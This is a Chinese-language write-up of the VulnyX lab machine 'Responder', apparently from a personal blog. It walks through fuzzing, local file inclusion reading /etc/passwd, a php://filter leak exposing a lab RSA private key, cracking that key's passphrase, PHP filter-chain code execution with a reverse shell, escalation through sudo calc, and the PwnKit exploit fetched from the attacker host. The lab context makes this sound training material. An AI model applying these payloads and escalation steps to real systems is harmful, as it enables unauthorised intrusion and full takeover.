Vlx_Responder

靶机来源: https://vulnyx.com/

难度:Medium

思维导图: img

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:08 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00068s latency).
MAC Address: 08:00:27:D6:F1:8C (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.14
Host is up (0.0015s latency).
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.65 seconds

靶机IP:192.168.2.14

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.14                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:08 +0800
Nmap scan report for 192.168.2.14
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp open     http
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.92 seconds

开放端口:8022端口被过滤了,应该是有防火墙阻拦

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:09 +0800
Nmap scan report for 192.168.2.14
Host is up (0.00100s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.14                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-02 10:09 +0800
Nmap scan report for 192.168.2.14
Host is up (0.0011s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:F9:CF:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 102.91 seconds

二、WEB渗透

1、80端口

访问80端口,提示your answer is in the answer..

1
2
3
┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.14                                                                                                
your answer is in the answer..

2、目录扫描

1
2
3
4
5
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak

index.html           (Status: 200) [Size: 31]
filemanager.php      (Status: 302) [Size: 0] [--> /]

找到一个目录filemanager.php,但是重定向到了/目录 考虑存在文件包含

3、FUZZ

使用fuff对参数进行测试

1
2
3
4
┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://192.168.2.14/filemanager.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

random                  [Status: 302, Size: 1430, Words: 13, Lines: 28, Duration: 27ms]

找到一个参数random,但是状态码是302

4、文件包含LFI

读取/etc/passwd,使用浏览器访问直接回重定向到/目录,不会回显出来内容

1
2
3
4
5
6
┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.14/filemanager.php?random=/etc/passwd                                                             
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash

找到两个用户elliot、rohit

5、PHP伪协议

使用php伪协议尝试读取filemanager.php的内容

1
2
3
┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.14/filemanager.php?random=php://filter/read=convert.base64-encode/resource=filemanager.php
PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydyYW5kb20nXTsKICAgIGluY2x1ZGUoJGZpbGVuYW1lKTsKICAgIGhlYWRlcignTG9jYXRpb246LycpOwoKCi8qCgotLS0tLUJFR0lOIFJTQSBQUklWQVRFIEtFWS0tLS0tClByb2MtVHlwZTogNCxFTkNSWVBURUQKREVLLUluZm86IERFUy1FREUzLUNCQyw0MTExMjREM0MzMDJENEY0CgpYQzJrYldOQllhMjB6REFyVDZCTWVDZ0thOW9SczhUNXNDVndzMXdHaWs4WldDaEY0aDZOOVR6RG5ER0VNVVBHClgrbEtwL2ZES2laeG1KZFd1M1doTGpnaVhOYnZYK2ZMaUtacFdCekNBVnB3U2ljUy9qaklvcHp6V2pFM1BBQjcKdlJmd2RxZGlhRks3bVF4TEozby95cksyQ0NJOHVkMlVsRUVrOER4VE1Ha2xtZmY4Y2JocldJYytieSs5QVM5dAp2S2Q3aHJzb0xSNkZheEJtZmRPNGRyMVFuOVBaa3ZvaEhuTW5wSTdmZEVDMlEzYXF1NnRGSU9EY1ZtNnJCYUlJClFNMENJUmRXSC9XaVc3WG10SlVyaUY1NXJRUkpxNCtTaFhXdFdLQlh5Sm5ZdnlFZHVxUWhpZUowQkE5WkpqenkKbXlhVjFWNWwwZUtNaHhXV0JrWWF6NmJtRnNMcGJtWEJCZ0lhaW96S1NLSU1HV2Exc1dDQUd2MEVtTURSbkRHNApDbHhrcWduRGNnWXNrcmRaTFBKNVlONzdNOU91QjMwL1ZJR1hqenNrSlBwMlhhdWJ6WVM3QnZOalRiaUQ1dUNVCmkxZkhFenBQSS9RZUhRMjVYbHFsR0NVbGE2YjhtTEZLTU05MUtjak82VE9TWWdBckMra3lrYnVxZ0RQTWM3a3QKTUtoeHJzeWttcGtOejZGeHNGNzhrL2Jtc3RQTmJZRHNhNHluemxJcGlRSG1zK3BhcElEY3NITTRyVURpYjhKaApIUU1mamJTY2hwTDBZeFZYQWl6NE52bzMzVlF4cDFXUmgwZ2VvTzNiWXoxRDk0RnZvenBlSUxGZXhuS2FRZVQzCkdMQ0xOeVoxQksvcDVLS2g1RjFPaFVVMGJyZ2h6a3M1TmpGWWZOb0dkbktmUnNPSUErNlg5N0FpRGpxZzltazQKWWZiT2dLSGw3NXVFTHk0MVd6dU5udXluZndXa0FOejdCaFdWL1FDTFM3Tml5YUN1Y1hKQkpqM0xSZFQ0Q2txZgozRjFTTmdzaERxNHZEQzRSd2tKVzJ1bVRtRHBXMHJaM3N5emViOVA0L2JtUVhrV1gvYnRvSUp6bW5CNnkrK0JzClhJcnRaS2ExeUo2L00wWEE2dEdUaStibllEMHdPbW9VNjRNM2wyMUhYdlFVT1hnU2c1bzBqSUpRY2VUS2NJTi8Kd0xMTk0weWJtenE3eitNbExHcnB5T2V6L2ZTQUVDdmFneVVaUm1ua3MwZVJSMW9Lek1TMDBlK3FFRko0R21lRQpZdTJkSVRDNkkzcFZSWlFHY0NzWldDWCtCUCs2NExjZHo0L241bGVuc2phYjBqZDI4S2M3MnNyYUR0ZVNsUC9ZCndXWk05c1liWHRjczE0Y0lQcFczYTFkYmtPVDFXR0V3anQwWDBGMEROZ0FwdkE4WG5sVHIrd2hKVmFNQnlBNFUKdDNVUUhWVUlOTm9Mblg3dVNCUG85NnlXY3dBTXVYams4ajNaYUZWZDVyT0dxL1hkMHBLQkJBUmQyVW45UVpuTgo0UHpFV0YxZDkvQk9ielNlbzJkVkVaZ1lYY1JFM3Ywb0VaSW1GSW94UWN2Z294eGVZak5WaVgwU3NZRUpmQTlGClBnOFpRNlIrWmpBM3BVMURxQnhXbkVySER5ZUdzblZCczhWSVFLT2lpWk1lQjEyVHg5YjlrOEU2cmpSSXc2TGEKVWJ6cFIrNENWZ1RvRDVUWkJEcEhoV0hkUGN2M0p1TkFiNDlYR2RzTDg4OXVUd0JYK2ZTVHZMNkZrWHRaanlTWApnbTZ2NXgvT1BaZzRCQi9DbkNXU2VpRytyVzBpTVU0VEdFNUxxZnV5QlpCT2hWY0R0cmkzcXBZTEdILzVOS2Z3CmRxMTVtOXJSZWgvSmVjNlo4Qk5pOVhvNWdFakdnbFFBL1RmdzJWcUNtcnNNYVUzaU5NTlhMS3JZVGNzbTBxSGIKdlJZdlFsOUdnZUFwZHJaL0JZL3lTYjZPak5VUzFOYzlWaXYwQU05aUNIcDR0SDZPZm1WcG5WekR1b2pka1hpWgpsQi92d2JDbzlDY0JadDdsTTkxSGw2MFpsaExzT2EvNjlQQWVDM2NaUjJaMXN2VmsxZ2NEcnc9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQoKCiovCgo/Pgo=

进行解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kali)-[~/miaosec]
└─# echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydyYW5kb20nXTsKICAgIGluY2x1ZGUoJGZpbGVuYW1lKTsKICAgIGhlYWRlcignTG9jYXRpb246LycpOwoKCi8qCgotLS0tLUJFR0lOIFJTQSBQUklWQVRFIEtFWS0tLS0tClByb2MtVHlwZTogNCxFTkNSWVBURUQKREVLLUluZm86IERFUy1FREUzLUNCQyw0MTExMjREM0MzMDJENEY0CgpYQzJrYldOQllhMjB6REFyVDZCTWVDZ0thOW9SczhUNXNDVndzMXdHaWs4WldDaEY0aDZOOVR6RG5ER0VNVVBHClgrbEtwL2ZES2laeG1KZFd1M1doTGpnaVhOYnZYK2ZMaUtacFdCekNBVnB3U2ljUy9qaklvcHp6V2pFM1BBQjcKdlJmd2RxZGlhRks3bVF4TEozby95cksyQ0NJOHVkMlVsRUVrOER4VE1Ha2xtZmY4Y2JocldJYytieSs5QVM5dAp2S2Q3aHJzb0xSNkZheEJtZmRPNGRyMVFuOVBaa3ZvaEhuTW5wSTdmZEVDMlEzYXF1NnRGSU9EY1ZtNnJCYUlJClFNMENJUmRXSC9XaVc3WG10SlVyaUY1NXJRUkpxNCtTaFhXdFdLQlh5Sm5ZdnlFZHVxUWhpZUowQkE5WkpqenkKbXlhVjFWNWwwZUtNaHhXV0JrWWF6NmJtRnNMcGJtWEJCZ0lhaW96S1NLSU1HV2Exc1dDQUd2MEVtTURSbkRHNApDbHhrcWduRGNnWXNrcmRaTFBKNVlONzdNOU91QjMwL1ZJR1hqenNrSlBwMlhhdWJ6WVM3QnZOalRiaUQ1dUNVCmkxZkhFenBQSS9RZUhRMjVYbHFsR0NVbGE2YjhtTEZLTU05MUtjak82VE9TWWdBckMra3lrYnVxZ0RQTWM3a3QKTUtoeHJzeWttcGtOejZGeHNGNzhrL2Jtc3RQTmJZRHNhNHluemxJcGlRSG1zK3BhcElEY3NITTRyVURpYjhKaApIUU1mamJTY2hwTDBZeFZYQWl6NE52bzMzVlF4cDFXUmgwZ2VvTzNiWXoxRDk0RnZvenBlSUxGZXhuS2FRZVQzCkdMQ0xOeVoxQksvcDVLS2g1RjFPaFVVMGJyZ2h6a3M1TmpGWWZOb0dkbktmUnNPSUErNlg5N0FpRGpxZzltazQKWWZiT2dLSGw3NXVFTHk0MVd6dU5udXluZndXa0FOejdCaFdWL1FDTFM3Tml5YUN1Y1hKQkpqM0xSZFQ0Q2txZgozRjFTTmdzaERxNHZEQzRSd2tKVzJ1bVRtRHBXMHJaM3N5emViOVA0L2JtUVhrV1gvYnRvSUp6bW5CNnkrK0JzClhJcnRaS2ExeUo2L00wWEE2dEdUaStibllEMHdPbW9VNjRNM2wyMUhYdlFVT1hnU2c1bzBqSUpRY2VUS2NJTi8Kd0xMTk0weWJtenE3eitNbExHcnB5T2V6L2ZTQUVDdmFneVVaUm1ua3MwZVJSMW9Lek1TMDBlK3FFRko0R21lRQpZdTJkSVRDNkkzcFZSWlFHY0NzWldDWCtCUCs2NExjZHo0L241bGVuc2phYjBqZDI4S2M3MnNyYUR0ZVNsUC9ZCndXWk05c1liWHRjczE0Y0lQcFczYTFkYmtPVDFXR0V3anQwWDBGMEROZ0FwdkE4WG5sVHIrd2hKVmFNQnlBNFUKdDNVUUhWVUlOTm9Mblg3dVNCUG85NnlXY3dBTXVYams4ajNaYUZWZDVyT0dxL1hkMHBLQkJBUmQyVW45UVpuTgo0UHpFV0YxZDkvQk9ielNlbzJkVkVaZ1lYY1JFM3Ywb0VaSW1GSW94UWN2Z294eGVZak5WaVgwU3NZRUpmQTlGClBnOFpRNlIrWmpBM3BVMURxQnhXbkVySER5ZUdzblZCczhWSVFLT2lpWk1lQjEyVHg5YjlrOEU2cmpSSXc2TGEKVWJ6cFIrNENWZ1RvRDVUWkJEcEhoV0hkUGN2M0p1TkFiNDlYR2RzTDg4OXVUd0JYK2ZTVHZMNkZrWHRaanlTWApnbTZ2NXgvT1BaZzRCQi9DbkNXU2VpRytyVzBpTVU0VEdFNUxxZnV5QlpCT2hWY0R0cmkzcXBZTEdILzVOS2Z3CmRxMTVtOXJSZWgvSmVjNlo4Qk5pOVhvNWdFakdnbFFBL1RmdzJWcUNtcnNNYVUzaU5NTlhMS3JZVGNzbTBxSGIKdlJZdlFsOUdnZUFwZHJaL0JZL3lTYjZPak5VUzFOYzlWaXYwQU05aUNIcDR0SDZPZm1WcG5WekR1b2pka1hpWgpsQi92d2JDbzlDY0JadDdsTTkxSGw2MFpsaExzT2EvNjlQQWVDM2NaUjJaMXN2VmsxZ2NEcnc9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQoKCiovCgo/Pgo=" | base64 -d
<?php
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');


/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7
vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t
vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII
QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy
myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4
ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU
i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt
MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh
HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3
GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4
YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf
3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs
XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/
wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE
Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y
wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U
t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN
4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F
Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La
UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX
gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw
dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb
vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ
lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw==
-----END RSA PRIVATE KEY-----


*/

?>

在里面发现一个被加密后的私钥,但是由于22端口是被过滤状态,无法从外部直接通过私钥进行连接。

三、RSACrack

使用RASCrack对加密的私钥进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[/tmp]
└─# /root/Tool/RSAcrack -k id_rsa -w /root/Tool/techyou.txt 

 ╭━━━┳━━━┳━━━╮          ╭╮  
 ┃╭━╮┃╭━╮┃╭━╮┃          ┃┃  
 ┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
 ┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
 ┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
 ╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
 code: d4t4s3c   ver: v1.0.0
─────────────────────────────
[i] Cracking | id_rsa
[i] Wordlist | /root/Tool/techyou.txt
[*] Status   | 3368/20000/16%/elliott
[+] Password | elliott
─────────────────────────────

获取到密码是:elliott,猜测可能是用户elliot的私钥

四、获取shell

使用FilterChain进行获取shell 工具:GitHub - synacktiv/php_filter_chain_generator · GitHub

  1. 构造代码
1
2
3
┌──(root㉿kali)-[~/Tool]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
....
  1. 执行命令,查看是否能成功执行 img 能成功回显id
  2. 执行反弹shell的命令 img
  3. 成功获取到shell
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.14] 43082
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
  1. 稳定shell
1
2
3
4
5
6
7
8
/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取elliot的权限

根据获取到的私钥,进行登录,这里只能使用localhost,使用IP无法进行登录

1
2
3
4
www-data@responder:/tmp$ ssh -i id_rsa elliot@localhost

elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) grupos=1001(elliot)

2、获取rohit权限

查看sudo -l

1
2
3
4
5
6
7
8
elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc

calc 是一个交互式程序,很可能可以执行系统命令或读写文件 支持通过 system()exec() 调用 shell 命令

直接执行命令获取rohit权限

1
2
3
4
5
6
7
8
9
10
11
12
elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type:  help copyright
[Type "exit" to exit, or "help" for help.]

; system("id")
uid=1002(rohit) gid=1002(rohit) grupos=1002(rohit)
        0
; system("/bin/bash")
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) grupos=1002(rohit)

3、获取root权限

查看suid文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
rohit@responder:~$ find / -perm -4000 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

发现存在/usr/bin/pkexec

查看版本信息

1
2
rohit@responder:~$ /usr/bin/pkexec --version
pkexec version 0.105

pkexec 版本 0.105 存在一个著名的本地提权漏洞(CVE-2021-4034),俗称 “PwnKit”

直接利用即可 CVE-2021-4034

  1. 将文件下载到靶机上
1
2
3
4
5
6
7
8
9
10
rohit@responder:/tmp$ wget http://192.168.2.4/cve-2021-4034-poc.c
--2026-04-02 05:15:43--  http://192.168.2.4/cve-2021-4034-poc.c
Conectando con 192.168.2.4:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1267 (1,2K) [text/x-csrc]
Grabando a: “cve-2021-4034-poc.c”

cve-2021-4034-poc.c 100%[===================>]   1,24K  --.-KB/s    en 0s      

2026-04-02 05:15:43 (268 MB/s) - “cve-2021-4034-poc.c” guardado [1267/1267]
  1. 进行编译
1
rohit@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
  1. 直接执行即可获取到root权限
1
2
3
rohit@responder:/tmp$ ./cve-2021-4034-poc 
# id
uid=0(root) gid=0(root) groups=0(root),1002(rohit)

五、查看FLAG

1
2
3
# cat /root/root.txt /home/rohit/user.txt
2dfxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
38exxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Vulnyx
#Fuzz #Php伪协议,RSACrack #Sudo_Calc #Suid_pkexec #CVE-2021-4034
Vlx_Responder
http://miao-sec.github.io/Vulnyx/Vlx-Responder/
作者
Miao
发布于
2026年4月2日
许可协议
BY-MIAO